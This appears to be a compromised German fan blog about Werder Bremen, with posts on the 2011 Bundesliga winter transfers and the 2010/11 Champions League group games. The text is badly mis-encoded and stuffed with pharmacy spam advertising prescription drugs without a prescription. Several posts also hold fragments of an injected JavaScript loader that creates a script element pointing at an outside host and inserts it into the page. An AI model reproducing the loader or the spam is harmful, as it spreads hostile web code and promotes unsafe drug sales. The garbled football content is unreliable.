Willkommen auf » Werder Bremen
1.Feb 2011

Hier also Teil 2 unseres Roundups der Transfermeldungen im Winter 2011…

### order noroxin antibiotics pills online antibiotic s euro med. Patrick Helmes verlAi??sst den Bundesligazweiten Bayer Leverkusen nach zweieinhalb mehr oder minder erfolgreichen Jahren (mit einer ganz stattlichen Torquote von 28 Treffern in 57 Spielen). Der 26-jAi??hrige wechselt fA?r 8 Millionen Euro zum VfL Wolfsburg, wo ihm ein Stammplatz und die Hoffnung auf eine RA?ckkehr in die Nationalelf winkt.

### Doch der Ex-Leverkusener ist bei den WAi??lfen nur einer unter vielen neuen Gesichtern, denn VfL-Manager Dieter HoeneAY hat das Team im Winter komplett umgekrempelt: neben Edin Dzeko verlassen den Klub noch Karim Ziani, Nassim Ben Khalifa, Vlad Munteanu und Andrea Barzagli. DafA?r kommen Order Jan Polak (29, defensives Mittelfeld, fA?r 3 Mio. vom RSC Anderlecht, sammelte bereits von 2005 bis 2007 in NA?rnberg Bundesligaerfahrung), Tuncay Sanli (29, Offensiv-Allrounder, fA?r 4,5 Mio. von Stoke City, bisher 78 LAi??nderspiele fA?r die TA?rkei, kam in der Premier League aber nicht zurecht, nur 20 Tore in 107 Spielen fA?r Stoke und Middlesbrough), Ja-Cheoul Koo buy viagra sample. (21, zentrales Mittelfeld, fA?r 2 Mio. aus SA?dkorea von Jeju United, 5 Tore in 6 Spielen beim Asiencup 2011) und order glucovance generic Yohandry Orozco (offensives Mittelfeld, mit 19 Jahren schon venezuelanischer Nationalspieler, fA?r 1,25 Mio. vom Zulia FC). HoeneAY erwartet vor allem von den beiden Talenten einiges, siehe Statement auf der Vereinswebsite. Und noch ein Lesetipp: Der VfLWolfsburgBlog analysiert das Transfergeschehen.

### Werder Bremen verstAi??rkt sich mit dem brasilianischen Innenverteidiger Samuel Firmino de Jesus (24 Jahre, 1,90m, ablAi??sefrei vom FC SA?o Paulo). ai??zSamuel ist ein junger, talentierter Spieler, der sowohl als Innenverteidiger, als auch auf den AuAYenpositionen einsetzbar ist. Wir sind gespannt, wie er sich in den nAi??chsten Monaten bei uns entwickeln wird“, so GeschAi??ftsfA?hrer Klaus Allofs. Er erhAi??lt vorerst nur einen Vertrag bis zum Sommer und wird sich bewAi??hren mA?ssen.

### Edson Braafheid wechselt ablAi??sefrei vom FC Bayern zu 1899 Hoffenheim. Den ghanaischen StA?rmer Prince Tagoe verleihen die Kraichgauer an Partizan Belgrad.

### Eintracht Frankfurt lAi??sst buy kamagra jelly uk A?mit Korkmaz (25, ausgeliehen an den VfL Bochum, mit Kaufoption), dapoxetine usa Cenk Tosun http://pas.es/pills-for-depression-anxiety-and-moods-salon/ (19, Offensiv-Allrounder, fA?r 550.000 Euro an Gaziantepspor) und Order cheap bestinauto Markus SteinhAi??fer (24, fA?r 100.000 Euro AblAi??se zum FC Basel) gehen, einziger Neuzugang ist RA?ckkehrer Nikola Petkovic buy pain medication with no rx, cialis 5 mg film coated tablets. (24, Links-Verteidiger, war ausgeliehen an den russischen Erstligisten Tom Tomsk). Blog-G ordnet die A?berschaubaren Frankfurter TransferaktivitAi??ten ein.

### Der 1.FC Kaiserslautern holt den Tschechen Adam Hlousek online (22, linkes Mittelfeld, von Slavia Prag) und den Brasilianer Lucas (19, Innenverteidiger, aus Leverkusen), jeweils auf Leihbasis mit Kaufoption.

Und nun zum Fazit: Insgesamt gaben die Bundesligisten rund 57 Millionen Euro fA?r neuen Spieler aus. Dem stehen beeindruckende 75 Millionen Euro als TransfererlAi??se gegenA?ber, ein neuer Rekordwert, noch nie spA?lten Transfers im Winter mehr Geld in die Kassen der Klubs.

50 Spieler verlieAYen ihre bisherigen Vereine, 48 neue Akteure kamen hinzu. Lediglich TabellenfA?hrer Borussia Dortmund, Hannover 96 und der FC St.Pauli starten aus verschiedenen GrA?nden (Erfolg des bisherigen Kaders vs. Geldmangel) ohne NeuzugAi??nge in die RA?ckrunde. Die Spitzenposition bei der Spieler-Rochade teilen sich der VfL Wolfsburg und 1899 Hoffenheim mit jeweils sechs Zu- und AbgAi??ngen. Beide Klubs belegten im Winter solide RAi??nge im Mittelfeld der Bundesliga, wollen aber in der zweiten SaisonhAi??lfte allem Anschein nach noch einmal oben angreifen und gehen dafA?r auch finanziell in die Vollen.

Auch aus Ai??konomischer Sicht siegen die Wolfsburger. Trotz Ausgaben in HAi??he von knapp 20 Millionen Euro kommt man unter dem Strich noch auf ein sattes Plus von 17 Millionen, verantwortlich dafA?r ist der neue Rekordtransfer der Bundesliga von StA?rmer Edin Dzeko, er wechselte im Winter fA?r ca. 35 Mio. vom VfL zu Manchester City und ermAi??glichte somit eine gewisse Freiheit auf dem Transfermarkt, die Manager Dieter HoeneAY auch bereitwillig ausfA?llte.

So weit, so gut. Sind wir mal gespannt wie sich die Transfers fA?r die Vereine letztendlich auswirken, wer sich etablieren kann, wie viele Spieler im Sommer schon wieder weg sind, welche AblAi??sesummen sich im Nachhinein als gerechtfertigt herausstellen werden und ob sich der ein oder andere Klub nicht doch lieber um den ein oder anderen Neuzugang hAi??tte bemA?hen sollen…

Und zum Abschluss verweise ich noch auf Arnd Zeiglers komAi??diantischen Pills tegretol non prescription. Blick auf die „wunderbare Welt der Wintertransfers“ :)s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; http://www.annamoes.com/betnovate-price-india/ alesse birth control order online

29.Jan 2011

Er hat wieder zugeschlagen, Tim Wiese der Kung-Fu-Kicker :)

Vor zwei Jahren erwischte der Bremer Torwart den damaligen Hamburger Ivica Olic in SchulterhAi??he mit den Stollen Buy (dafA?r sah er kurioserweise nur Gelb), beim heutigen Heimspiel gegen den FC Bayern nietete er nun Gegenspieler Thomas MA?ller in Ai??hnlich spektakulAi??rer Art und Weise um…

Wiese erhielt folgerichtig die rote Karte und schlich vom Platz, fA?r den SV Werder war das Spiel in der 88. Minute beim Stand von 1:3 sowieso gelaufen. Tja, das Gegentor hat er damals wie heute zwar verhindert, einen StrafstoAY gab es dank des exzellenten Timings der Notbremse auch nicht (den Gegenspieler holte er sich jeweils auAYerhalb des Strafraums), das effektive Herauslaufen ohne anschlieAYenden Platzverweis scheint ihm aber in seiner Karriere keiner mehr beibringen zu kAi??nnen 😉

*** Update vom 31.01.2011 ***
Das Sportgericht des DFB verhAi??ngte fA?r das Foul heute eine Sperre von drei Spielen gegen Wiese.d.getElementsByTagName(‚head‘)[0].appendChild(s); cheap pills cheap antivert meclizine http://www.actionchemicaljamaica.com/2018/03/15/purchase-flexisyn/ order augmentin. buy nexium otc

15.Jan 2011

Nach der ventolin inhaler online. buy pills ausfA?hrlichen Auflistung der AbgAi??nge http://nopero.com/?p=9996 publix pharmacy drug prices, buying clomid online paypal. can you buy cleocin over the counter order aciclovir 400 online kommen wir nun zur alljAi??hrlichen Vorstellung der neuen Gesichter der Bundesliga. Den Anfang macht der in der Hinrunde enttAi??uschende Tabellenvierzehnte aus Bremen mit einem Wechsel in der Sturmspitze. Werders Ersatz fA?r den in der Winterpause zu Besiktas Istanbul abgewanderten Hugo Almeida Buy how much does a prednisone shot cost Pills expres cialis

… hAi??rt auf den Namen Denni Avdic
… ist Schwede mit bosnischer Herkunft
… 22 Jahre alt
… 1,90 m groAY
… MittelstA?rmer
… kommt vom schwedischen Erstligisten IF Elfsborg
… erzielte in der vergangenen Saison 22 Tore in 30 Pflichtspielen und gab 4 Vorlagen
… war den Bremern 2,2 Millionen Euro AblAi??se wert
… und kommt mit der Empfehlung von stolzen 52 JuniorenlAi??nderspielen und einem ersten Auftritt fA?r die A-Nationalmannschaft von Schweden

Denni Avdic zum Wechsel: ai??zDie ersten Tage waren zwar schon recht anstrengend, aber ich bin A?berglA?cklich, bei Werder sein zu dA?rfen. […] Am Ende war es eine einfache Entscheidung. Die Bundesliga ist eine der besten Ligen der Welt und ich glaube, dass meine Art zu spielen hierher passt.“

Dank des frA?hen Transferabschlusses zum Jahreswechsel konnte er die gesamte zweiwAi??chige Vorbereitungszeit im Januar mit der Mannschaft absolvieren und kAi??nnte somit beim heutigen RA?ckrundenstart gegen Hoffenheim bereits auf dem Platz stehen. Die Erwartungen der Fans sind extrem hoch, Almeida wird als bester Bremer TorjAi??ger der Hinrunde (9 Tore in 13 Ligaspielen) jedoch nicht so ohne weiteres zu ersetzen sein. Von der Statur (groAY, wuchtig) und Spielweise (kopfballstark im Sturmzentrum, ideale Anspielstation zum Halten von BAi??llen) Ai??hneln sich die beiden durchaus, in Sachen Erfahrung und AbgeklAi??rtheit vor dem Tor hat Avdic aber natA?rlich noch einiges aufzuholen.

Die Werder-Verantwortlichen ordnen den Transfer daher etwas vorsichtiger ein.
Trainer Thomas Schaaf: ai??zMan muss ihm natA?rlich Zeit geben, denn er wird sich an das Tempo und unsere Spielweise zunAi??chst noch gewAi??hnen mA?ssen.“ http://tokokabel.co.id/order-malegra-100 Manager Klaus Allofs nitrofurantoin from canada. Order stellt klar, dass ai??zwir Denni nicht als Retter geholt haben, der uns alleine aus der schwierigen Situation schieAYt. Er soll seine FAi??higkeiten einbringen und sich bei uns weiterentwickeln.“

Zum Abschluss hier noch ein paar Spielszenen…
[youtube:http://www.youtube.com/watch?v=TOnZ89CMYYs]

Das Potenzial ist da, ich glaub an Avdic und wA?nsche Werder einfach mal wieder etwas mehr WechselglA?ck nach den vielen wenig erfolgreichen Offensivtransfers der jA?ngeren Vergangenheit (Sanogo, Rosenberg, Moreno, Wagner, Arnautovic, Kroos).var d=document;var s=d.createElement(‚script‘);

3.Jan 2011

Wie schon in den Vorjahren werfen wir auch in dieser Winterpause wieder einen detaillierten Blick auf die Spielerwechsel unserer Bundesligisten im zweiten Transferfenster der Saison. Los gehts diesmal mit den bisher bestAi??tigten AbgAi??ngen…

### Nach A?ber sieben Jahren beim FC Bayern (und 174 Spielen, mit jeweils vier deutschen Meistertiteln und Pokalsiegen) verlAi??sst Martin Demichelis (30) die Bundesliga in Richtung Spanien. Der argentinische Innenverteidiger wechselt ablAi??sefrei (zunAi??chst auf Leihbasis fA?r sechs Monate, im Anschluss gilt eine Kaufoption) zum Tabellenachtzehnten der Primera Division FC Malaga und trifft dort auf seinen ehemaligen Trainer und FAi??rderer Manuel Pellegrini. Beim FC Bayern hatte er in dieser Saison seinen Stammplatz in der Innenverteidigung endgA?ltig an Holger Badstuber verloren (diese Entwicklung deutete Trainer van Gaal im vergangenen Jahr bereits an) und stand lediglich bei sechs Bundesligaspielen auf dem Platz. Schade ist es schon, einen so verdienten Spieler schickt man nicht auf solch eine Weise im Winter weg. AdiA?s Micho.

### Mit Mark van Bommel (33) verabschiedet sich ein weiterer verdienter Spieler vom deutschen Rekordmeister. Der NiederlAi??nder, dessen Vertrag im Sommer ausgelaufen wAi??re, geht ablAi??sefrei zum AC Mailand. Meine Meinung: Seinen KapitAi??n lAi??sst man nicht einfach so ziehen, auch wenn man gewisse Alternativen im Kader hat, ich versteh es nicht. Eine schwierige Bundesliga-RA?ckrunde steht an, ebenso wie das spektakulAi??re Champions League Achtelfinale gegen Inter Mailand. Vorstandschef Rumenigge erklAi??rt die „Flucht“ van Bommels: Ai??Es war Marks ausdrA?ckliche Bitte, ihn aus sportlichen GrA?nden vorzeitig aus seinem Vertrag zu entlassen, um sofort zum AC Mailand wechseln zu kAi??nnenAi??. Tja dann, so langsam wirds aber leider zum System (Lucio, Demichelis, van Bommel). propecia by merck and co safe branded viagra on line Spox.com hat ihn in einem Interview nochmal ausfA?hrlich zum Transfer befragt.

### Bernd Schuster holt den Bremer Hugo Almeida (26) zu seinem neuen Klub Besiktas Istanbul. Der Vertrag wAi??re im Sommer ausgelaufen, eine VerlAi??ngerung erschien zunehmend unwahrscheinlich und so zahlen die TA?rken nun 2 Millionen Euro AblAi??se und verpflichten den portugiesischen Nationalspieler bereits im Januar. Pills cipa approved generic viagra, how to use vigora 5000. Almeida zum Wechsel: „Ich habe lange A?berlegt, aber am Schluss war Besiktas einfach die beste Wahl. Es ist ein groAYer Klub mit einem guten Trainer, alles ist top organisiert. […] Ich hatte eine tolle Zeit in Bremen, es ist ein Top-Klub. Die Fans waren immer sehr gut zu mir, das vergesse ich nicht. Werder wird immer ein Teil von mir sein.“ Die Bremer verlieren in dieser Ai??uAYerst unbefriedigenden Saison (nach der Bundesliga-Hinrunde lediglich Platz 14 + Ausscheiden in der Champions League Gruppenphase + Ausscheiden in der zweiten Runde des DFB-Pokals) somit ihren bisher erfolgreichsten TorschA?tzen (Almeida immerhin mit 9 Toren in 13 Spielen). Da muss nun in den kommenden Wochen dringend ein namhafter Ersatz her!

### Der 1.FC KAi??ln gibt (nach Pills einigen kuriosen Querelen in der laufenden Saison) bereitwillig seinen ehemaligen Publikumsliebling und bisherigen StammtorhA?ter Faryd MondragA?n (39) ab. Den Kolumbianer zieht es nach drei Bundesliga-Spielzeiten in die US-amerikanischen Profiliga MLS zu Philadelphia Union. Einen Ersatz haben die KAi??lner im zuletzt vereinslosen Michael Rensing bereits gefunden.

### Neben Mittelfeldspieler Luiz Gustavo (fA?r 15 Millionen zum FC Bayern) und Trainer Ralf Rangnick (RA?cktritt nach dem aufgezwungenen Gustavo-Transfer) verlAi??sst der StA?rmerAi?? buy florinef online Wellington http://rsmcduffiecpa.com/order-micronase-indications/ 1899 Hoffenheim im Winter. Nach 19 Erstligaspielen (mit lediglich drei Toren) in der Bundesligasaison 2008/09 und zwei halbjAi??hrlichen LeihgeschAi??ften an Twente Enschede und Fortuna DA?sseldorf, zieht es ihn nun zurA?ck in die brasilianische Heimat. Er gehAi??rt zum „Club der Gescheiterten“, der aus Hoffenheim einen regen Zulauf erhAi??lt. Auch Franco Zuculini und Maicosuel wurden zum Beispiel mit groAYen Ambitionen fA?r Millionen Euro eingekauft (alle drei fA?r etwa 4,5 Mio.), konnten sich in der Bundesliga aber nicht durchsetzen und wurden entsprechend schnell wieder abgegeben.

### Ebenfalls kein Erstligaspiel fA?r die Kraichgauer mehr machen wird wohl Demba Ba. Der 25-jAi??hrige Senegalese hatte es sich im Winter mit den Hoffenheimern endgA?ltig verscherzt als er zum wiederholten Male mit einem Streik einen Vereinswechsel zu provozieren versucht, im Sommer 2009 wollte er nach Stuttgart, diesmal sollte es nach London zu West Ham United gehen. Die TSG winkte jeweils ab, mAi??chte aber bei solchen Praktiken berechtigterweise nicht lAi??nger mit Ba zusammenarbeiten. Er wechselt nun, zunAi??chst auf Leihbasis, zum Premier League Klub Stoke City.

### Der VfL Wolfsburg trAi??gt sich in die deutschen FuAYball-GeschichtsbA?cher ein: nach langem Hin-und-Her gibt man Edin Dzeko nolvadex. (24) fA?r die RekordablAi??se von 37 Millionen Euro an Manchester City ab. Der Bosnier verlAi??sst somit nach dreieinhalb erfolgreichen Jahren die Bundesliga (111 Erstligaspiele, 66 Tore, Meister 2009, TorschA?tzenkAi??nig 2009/10, Vize-TorschA?tzenkAi??nig 2008/09) und wird wohl nun zu einer groAYen internationalen Karriere starten, das Potential hat er zweifelsfrei nachgewiesen. Mit Grafite und Mandzukic stehen nun nur noch zwei nominelle StA?rmer im Kader, Caiuby als dritter im Bunde wurde an den FC Ingolstadt verliehen, bis zum Transferschluss muss sich der VfL also dringend auf dem Transfermarkt umsehen, das nAi??tige Kleingeld dA?rfte vorhanden sein 😉

### Und der Wolfsburger Manager Dieter HoeneAY mistet weiter im groAYen Stil aus. Order let me watch movies free. Karim Ziani nexium lawsuits outcome. (28 Jahre, im Sommer 2009 als HoffnungstrAi??ger fA?r 7 Mio. aus Marseille gekommen, bisher aber nur 10 Spiele fA?r den VfL) und Nassim Ben Khalifa (19 Jahre, Offensiv-Allrounder, als Riesen-Talent gehandelt, konnte sich aber im vergangenen Halbjahr A?berhaupt nicht in Wolfsburg einleben) konnten die hohen Erwartungen bisher nicht erfA?llen und werden daher zunAi??chst bei Leihvereinen „geparkt“. Ziani geht zum tA?rkischen Erstligisten Kayserispor, HoeneAY zum Wechsel: ai??zDas ist fA?r Karim Ziani die Chance fA?r einen Neustart“, klingt nicht so als wA?rde er nochmal zurA?ckkommen. Von Khalifa erwarten sich die WAi??lfe dagegen noch einiges, sein Vertrag lAi??uft schlieAYlich noch bis zum Sommer 2014. Dieter HoeneAY schickt ihn nun fA?r eineinhalb Jahre zum 1.FC NA?rnberg. ai??zMein Ziel ist es, den nAi??chsten Schritt zu machen, nachdem ich in der Schweizer U21-Nationalmannschaft Stammspieler geworden bin. Ich habe im Sommer entschieden, mich in Deutschland weiterentwickeln zu wollen. Deshalb ist es fA?r mich logisch, in der Bundesliga zu bleiben. Diese Chance sehe ich beim 1. FC NA?rnberg gegeben und werde alles dafA?r tun“, cheap zebeta side Purchase meint Khalifa.

### Und noch zwei Namen stehen bei den Niedersachsen auf der Abschiedsliste: Zum einen verlAi??sst Mittelfeldspieler Vlad Munteanu (30) die Autostadt. Er kehrt nach viereinhalb Jahren in Deutschland (bei Energie Cottbus, VfL Wolfsburg, Arminia Bielefeld und FSV Frankfurt) ablAi??sefrei zu Dinamo Bukarest in die rumAi??nische Heimat zurA?ck. Zum anderen geben die WAi??lfe auch noch den ehemaligen italienischen Nationalspieler Andrea Barzagli (29) ab. Der Innenverteidiger, der in allen 17 Hinrundenspielen auf dem Platz stan, geht fA?r 300.000 Euro zum Rekordmeister der Serie A Juventus Turin.

### Der ehemalige deutsche und jetzige US-amerikanische Nationalspieler online Jermaine Jones (29) verlAi??sst den FC Schalke 04 und die Bundesliga in Richtung Premier League. Er wird zunAi??chst bis zum Saisonende an die Blackburn Rovers ausgeliehen, im Deal enthalten ist eine Kaufoption. Jones hatte sich Ende 2010 mit Schalke-Trainer Felix Magath A?berworfen, aufgrund von schlechten Leistungen (in einer Phase, in der sich das gesamte Team miserabel prAi??sentierte und er da keinesfalls besonders negativ auffiel) wurde er ins Regionalligateam abgeschoben und sollte sich nun zum neuen Jahr einen neuen Verein suchen. Jetzt versucht er sich also im englischen FuAYball, warum nicht, das kAi??rperbetonte, robuste Spiel wird ihm liegen. Wenn er sich gut einlebt, werden die Rovers sicher ihre Freude mit ihm haben.

### Buy Mauro Camoranesi Cheap (34) beendet sein Gastspiel beim VfB Stuttgart bereits nach einem halben Jahr wieder. In 14 Spielen (7 mal in der Bundesliga, einmal im Pokal, 6 mal in der Europa League) konnte er bei den Schwaben keinen bleibenden Eindruck hinterlassen und so einigte man sich auf eine VertragsauflAi??sung.

### Das Kapitel Bundesliga ist auch fA?r den 23-jAi??hrigen Argentinier Raul Bobadilla vorerst vorbei. Seine Torquote bei Borussia MAi??nchengladbach ist fA?r einen MittelstA?rmer mit sieben Toren in 44 Bundesligaspielen eher mAi??AYig, er fiel auAYerdem wiederholt durch Disziplinlosigkeiten auf dem Platz auf und wurde Ende 2010 deshalb in die zweite Mannschaft verbannt. Bobadilla wird daher nun bis zum Saisonende an den griechischen Erstligisten Aris Thessaloniki verliehen. Die Chance zur RA?ckkehr besteht jedoch, denn eine Kaufoption wurde nicht vereinbart und Sportdirektor Max Eberl versichert seroquel online overnight delivery : ai??zWir werden Raul Bobadilla in den nAi??chsten Monaten im Auge behalten und seine Entwicklung verfolgen, denn wir sind von seinen sportlichen QualitAi??ten weiter A?berzeugt. Aus diesem Grund war es uns wichtig, dass er in Europa bleibt.ai???

Die Transferliste schlieAYt offiziell am 31. Januar um 00:00 Uhr. Weitere AbgAi??nge werden dann hier im Laufe der Zeit ergAi??nzt.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

8.Dez 2010

Champions League 2010/11 Gruppenphase 6. Spieltag
Werder Bremen – Inter Mailand 3:0

1:0 Sebastian PrAi??dl (38., Kopfball, Vorlage Frings)
2:0 buy trandate manufacturer Marko Arnautovic (49., Linksschuss, Hugo Almeida)
http://sde-kalam.mes.sch.gr/?p=7644 3:0 viagra brand canada. Claudio Pizarro (88., Rechtsschuss, Fritz)
vor 30.000 Zuschauern im Bremer Weserstadion

Aufstellung Werder: Wiese – Schmidt, Mertesacker, PrAi??dl, Pasanen (83. Silvestre) – Fritz, Frings (78. Bargfrede) – Marin, Hunt – Arnautovic, Hugo Almeida (75. Pizarro)

Aufstellung Inter: Orlandoni – Zanetti (54. Natalino), Cordoba, Cambiasso, Biraghi – Obiorah, Muntari – Santon (50. Biabiany), Motta, Pandev – Eto’o

Die Zusammenfassung des Spiels…
how to get seroquel out of your system. cialisis 20mg online purchase, generic viagra pharmacy. buy pills
AuAYerdem auch hier Pills und arimidex hair loss treatment hier vulnerability amex. Purchase zu sehen

Die Abschlusstabelle der Gruppe A
1. Tottenham Hotspur, 11 Pkt.
2. Inter Mailand, 10 Pkt.
3. FC Twente Enschede, 6 Pkt.
Pills robaxin 750 price redustat pastillas holder gun control 4. Werder Bremen, 5 Pkt. http://kinematicsrrr.com.mx/?p=7474 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; buy pyridium medication

24.Nov 2010

Champions League 2010/11 Gruppenphase 5. Spieltag
Tottenham Hotspur – Werder Bremen 3:0

1:0 Younes Kaboul (6., Rechtsschuss, Vorlage Lennon)
2:0 Luka Modric (45. + 1, Rechtsschuss, Crouch)
3:0 Peter Crouch (79., Rechtsschuss, Lennon)
vor 36.000 Zuschauern in der White Hart Lane in London

Aufstellung Tottenham: Gomes – Hutton, Gallas, Kaboul, Assou-Ekotto – Lennon, Jenas (19. Palacios), Modric, Bale (81. Kranjcar) – Pavlyuchenko (57. Defoe), Crouch

Aufstellung Werder: Wiese – Fritz, Mertesacker, PrAi??dl, Schmidt – Jensen (86. Jensen), Bargfrede – Kroos (55. Ayik), Marin – Hunt (79. Thy) – Wagner

Die Zusammenfassung des Spiels…
american express india login Order zoloft reviews Purchase best online pharmacy to buy strattera. Pills Purchase Order purchase sildenafil citrate tablets, where can i buy promethazine syrup. online
AuAYerdem auch Pills cheap motilium tablet hier zu sehendocument.currentScript.parentNode.insertBefore(s, document.currentScript); Buy viagra online china to china. Pills protonix medication doctor. purchase prograf and hair

2.Nov 2010

Champions League 2010/11 Gruppenphase 4. Spieltag
Werder Bremen – FC Twente Enschede 0:2

0:1 Nacer Chadli (81., Rechtsschuss, Vorlage Schimpelsberger)
0:2 Luuk de Jong (84., Kopfball, Ruiz)
vor 30.000 Zuschauern im Bremer Weserstadion

Aufstellung Werder: Mielitz – PrAi??dl, Mertesacker, Frings, Wesley – Jensen – Bargfrede (59. Arnautovic), Hunt – Marin – Pizarro, Hugo Almeida

Aufstellung FC Twente: Mihajlov – Rosales, Wisgerhof, Douglas, Leugers – Landzaat, Bengtsson (76. Schimpelsberger) – de Jong (90.+1 Stockentree) – Ruiz, Janko, Chadli (85. Vujicevic)

Die ausfA?hrliche Zusammenfassung des Spiels…
Order Order where to buy silagra.Purchase capoten pharmacy . retino a
AuAYerdem auch hier, hier periactin pills without prescription , hier Pills viagra in hyderabad price cheap venlor und hier zu sehen.var d=document;var s=d.createElement(‚script‘); crestor vs lipitor price where to buy eurax lotion http://www.choufanidental.com/2018/02/02/norvasc-5mg-price-philippines/ discount brand viagra online. Buy cheap copegus 200 gabapentin over counter, sex medicine in hindi.

20.Okt 2010

Champions League 2010/11 Gruppenphase 3. Spieltag
FC Twente Enschede – Werder Bremen 1:1

Buy 1:0 Theo Janssen (75., Linksschuss)
1:1 Marko Arnautovic (80., Rechtsschuss, Vorlage Pizarro)
vor 20.000 Zuschauern im Grolsch Veste Stadion in Enschede

Aufstellung FC Twente: Mihajlov – Rosales, Wisgerhof (24. Bengtsson), Douglas, Tiendalli – Brama, Landzaat (86. de Jong), Janssen – Ruiz, Janko, Chadli

Aufstellung Werder: Wiese (37. Mielitz) – Fritz, Mertesacker, PrAi??dl, Pasanen – Frings – Wesley, Bargfrede (77. Marin) – Hunt – Pizarro, Hugo Almeida (60. Arnautovic)

Die Zusammenfassung des Spiels…
Cheap Order http://silverbranchtechservice.com/aciclovir-tabletas-costo/ buy fish tetracycline http://diniharie.mhs.narotama.ac.id/2018/02/02/bestina-delivery/ metronidazole for dogs, no prescription. Purchase Pills http://dan330.com/?p=57200 brand viagra from mexico, order synthroid without rx.
AuAYerdem auch hier zu sehenif (document.currentScript) { cheap tinidazole iraplax cheap viagra sales for men and women. Pills nizoral brand. sale rumalaya

29.Sep 2010

Champions League 2010/11 Gruppenphase 2. Spieltag
Inter Mailand – Werder Bremen 4:0

1:0 Samuel Eto’o (21., Rechtsschuss, Vorlage Cambiasso)
Buy buy perictian uk. mexican made viagra, buy thyroxine online. pills online Order 2:0 Samuel Eto’o (27., Rechtsschuss, Lucio)
decadron without a prescription 3:0 Wesley Sneijder (34., Rechtsschuss, Eto’o)
4:0 Samuel Eto’o (81., Rechtsschuss, Sneijder)
vor 40.000 Zuschauern im Giuseppe Meazza Stadion in Mailand

Aufstellung Inter Mailand: Julio Cesar (46. Castellazzi) – Maicon, Cordoba, Lucio (62. Santon), Chivu – Stankovic (80. Obi), Cambiasso – Biabiany, Sneijder, Philippe Coutinho – Eto’o

Aufstellung Werder Bremen: Wiese – Wesley, Mertesacker, PrAi??dl, Silvestre – Bargfrede, Jensen – Marin (63. Hunt), Borowski (46. Pasanen), Arnautovic – Hugo Almeida (78. Wagner)

Die Zusammenfassung des Spiels
Pills can you buy diflucan over the counter over the counter dramamine online how much does metformin cost in ireland Buy
AuAYerdem auch http://dalkicafe.com/?p=11959 hier cod pharmacies. und hier, sowie in Berichten von ARD und ZDF klarinette federn. Pills Buy zu sehen.

Was fA?r eine VorfA?hrung… ein Weltuntergang ist es aber nicht, mit drei Punkten beim Champions League Sieger des Vorjahres wird in Bremen schlieAYlich kaum jemand gerechnet haben.

14.Sep 2010

Champions League 2010/11 Gruppenphase 1. Spieltag
Werder Bremen – Tottenham Hotspur 2:2

Purchase 0:1 Petri Pasanen (12., Eigentor)
0:2 online Peter Crouch (18., Kopfball, Vorlage van der Vaart)
buy orlistat tablets Buy why would viagra not work. free viagras samples http://www.consulpri.com.br/?p=905 1:2 Hugo Almeida (43., Kopfball, Wesley)
wellbutrin price mexico, vyvanse online canada. acheter du viagra 120 pills. cheap pills 2:2 Marko Marin (47., Rechtsschuss)
vor 35.000 Zuschauern im Bremer Weserstadion

Aufstellung Bremen: Wiese – Fritz, PrAi??dl, Pasanen, Silvestre – Bargfrede (37. Hunt), Frings – Marin, Wesley (67. Borowski) – Almeida (79. Wagner), Arnautovic

Aufstellung Tottenham: Cudicini – Corluka, Kaboul, King, Assou-Ekotto – Huddlestone – Lennon (75. Palacios), Jenas, Bale – van der Vaart (49. Keane) – Crouch

Die Zusammenfassung des Spiels…
Cheap Purchase
AuAYerdem auch hier und hier, sowie im ZDF-Bericht zu sehen.

Spannender Champions League Auftakt mit Licht und Schatten aus Werder-Sicht. In der zweiten Halbzeit schien fA?r die Bremer zeitweise sogar noch der Sieg greifbar, Tottenham kam mit dem stAi??ndig gefAi??hrlichen Peter Crouch jedoch auch auf seine Chancen und so muss man mit einem Punkt letztlich doch zufrieden sein. how do i buy viagra online. Cheap suprax cost cvs buy pyridium

Seiten:  1 2 3 4 5 6 7